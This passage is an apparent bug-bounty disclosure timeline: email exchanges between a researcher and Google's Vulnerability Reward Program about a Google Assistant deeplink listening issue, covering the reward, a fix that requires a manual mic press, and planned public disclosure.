Great job (as always) - thank you for pointing that out! I’ve reached out to the product team with all the info you’ve shared to make them aware of this. We will keep you posted as we learn more! Thanks! [redacted] Vendor - 2021-06-08 14:49 Hi David, Was your latest test on an actual phone or an emulation? Can you provide us the phone model you used to test this? Me - 2021-06-08 19:05 Hi, I used a real device, a Pixel 5 with the latest Google app. Thank you, David Vendor - 2021-06-08 19:58 Thanks David. Me - 2021-07-11 07:47 Hi, Is there any update on this issue? When is the fix expected? Thank you, David Vendor - 2021-07-13 08:59 Hi David, I don’t have any updates on the timeline of the fix yet. Having said that, I can confirm that the team is working on the fix and that your report was sent to the VRP Panel. We had some difficulties to reproduce this issue but you should get an update on your reward later today. Best, [redacted] Vendor - 2021-07-13 15:20 ** NOTE: This is an automatically generated email ** Hello, Regarding our Vulnerability Reward Program: The VRP panel has decided to issue a reward of $3133.70 for your report. Congratulations! Important: If you aren’t already registered with Google as a supplier, p2p-vrp@google.com will reach out to you. If you have registered in the past, no need to repeat the process – you can sit back and relax, and we will process the payment soon. Note: This month, we are changing our payment processing backend. There might be small delays (a few weeks) with how the payments are processed. Thanks for understanding, and sorry for the trouble! If you have any payment related requests, please direct them to p2p-vrp@google.com. Please remember to include the subject of this email and the email address that the report was sent from. Regards, Google Security Bot P.S. Two other things we’d like to mention: If you’d like us to add your name to our Hall of Fame at https://bughunter.withgoogle.com/rank/hof, please create a profile at https://bughunter.withgoogle.com/new_profile if you haven’t already done so. We encourage you to sign up for our Vulnerability Research Grants program at https://www.google.com/about/appsecurity/research-grants/, where we issue monetary payments to VRP researchers, even when no vulnerabilities are found. – How did we do? Please fill out a short anonymous survey (https://goo.gl/IR3KRH). Me - 2021-08-11 13:07 Hi, It looks like to me that if the Assistant is opened with deeplink, it requires a manual press on the mic icon to start listening. This seems to fix the issue. Can you please confirm this? Did the product team implement this as a fix? [Disclosure Warning!] I plan to disclose this bug at a security conference in October, and in an internal company-wide talk on Friday. Please let me know if I should delay disclosure. Thank you, David Me - 2021-08-13 07:36 [redacted] confirmed that the product team has indeed pushed a fix. I’ll disclose the issue today. Vendor - 2021-08-08 16:19 Thanks for letting us know David :) </code></pre>